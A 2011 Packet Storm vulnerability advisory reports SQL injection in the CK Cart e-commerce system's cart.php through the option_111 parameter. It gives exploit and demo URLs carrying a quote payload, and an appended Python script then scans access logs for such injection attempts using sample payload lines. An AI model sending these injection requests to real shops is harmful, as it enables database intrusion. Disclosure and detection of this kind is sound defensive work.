CK Cart SQL Injection

2011-08-22T00:00:00
ID PACKETSTORM:104305
Type packetstorm
Reporter Eyup CELIK
Modified 2011-08-22T00:00:00

Description

                                        
                                            `# Exploit Title: CK Cart (E-Commerce System) SQL Injection  
# Date: 19.08.2011  
# Author: Eyup CELIK  
# Software Link: http://www.ckcart.com/  
# Version: All Version  
# Tested on: All versions are vulnerable  
  
ISSUE  
  
SQL injection is possible through the item option input (the option_111 parameter) of the add-to-cart request.  
  
Vulnerable Page:  
cart.php  
  
Example:  
cart.php?action=add&item_id=173&manufacturer_id=34&option_111=%24<SQL Injection Code>&quantity=1&submit=Order  
  
Exploit:  
cart.php?action=add&item_id=173&manufacturer_id=34&option_111=%24'1&quantity=1&submit=Order  
  
Demo:  
http://www.ckcart.com/cart.php?action=add&item_id=173&manufacturer_id=34&option_111=%24<SQL Injection Code>&quantity=1&submit=Order  
  
  
Thanks,  
  
  
Eyup CELIK  
Bilgi Teknolojileri Güvenlik Uzmani  
http://www.eyupcelik.com.tr  
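The request pattern described in the advisory leaves a clear trace in web-server access logs. The following Python script is an added detection example, not part of the original advisory or of CK Cart itself; it assumes combined-format log lines (constructed sample data below), a cart.php at the site root, and the option_<n> parameter family named in the advisory.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined-format access log lines; constructed sample data, not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [19/Aug/2011:10:01:02 +0300] "GET /cart.php?action=add&item_id=173&manufacturer_id=34&option_111=%24&quantity=1&submit=Order HTTP/1.1" 200 512
10.0.0.7 - - [19/Aug/2011:10:01:09 +0300] "GET /cart.php?action=add&item_id=173&manufacturer_id=34&option_111=%24%271&quantity=1&submit=Order HTTP/1.1" 500 88
10.0.0.9 - - [19/Aug/2011:10:02:11 +0300] "GET /search.php?q=O%27Reilly HTTP/1.1" 200 2048
10.0.0.7 - - [19/Aug/2011:10:03:33 +0300] "GET /cart.php?action=add&item_id=173&manufacturer_id=34&option_111=%2524%25271&quantity=1&submit=Order HTTP/1.1" 500 88
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+$'
)
OPTION_PARAM = re.compile(r"^option_\d+$")  # the vulnerable parameter family
SQL_META = re.compile(r"""['"]|--|/\*""")   # quote or comment opener in a value

def parse_line(line):
    """Split one combined-format log line into fields, or None if malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def suspicious_params(target):
    """(name, decoded value) pairs for /cart.php option_* params holding SQL metacharacters."""
    parts = urlsplit(target)
    if parts.path != "/cart.php":
        return []
    hits = []
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if not OPTION_PARAM.match(name):
            continue
        for value in values:
            # parse_qs decoded once; decode again so a double-encoded quote is not missed
            decoded = unquote(value)
            if SQL_META.search(decoded):
                hits.append((name, decoded))
    return hits

def scan_log(text):
    """One alert dict per log line that carries a suspicious option_* value."""
    alerts = []
    for rec in filter(None, map(parse_line, text.splitlines())):
        hits = suspicious_params(rec["target"])
        if hits:
            alerts.append({"ip": rec["ip"], "status": rec["status"], "params": hits})
    return alerts
```

Calling `scan_log(SAMPLE_LOG)` flags only the two cart.php requests whose option_111 value decodes to a string containing a quote; the benign `%24` value and the apostrophe in the unrelated search query are left alone.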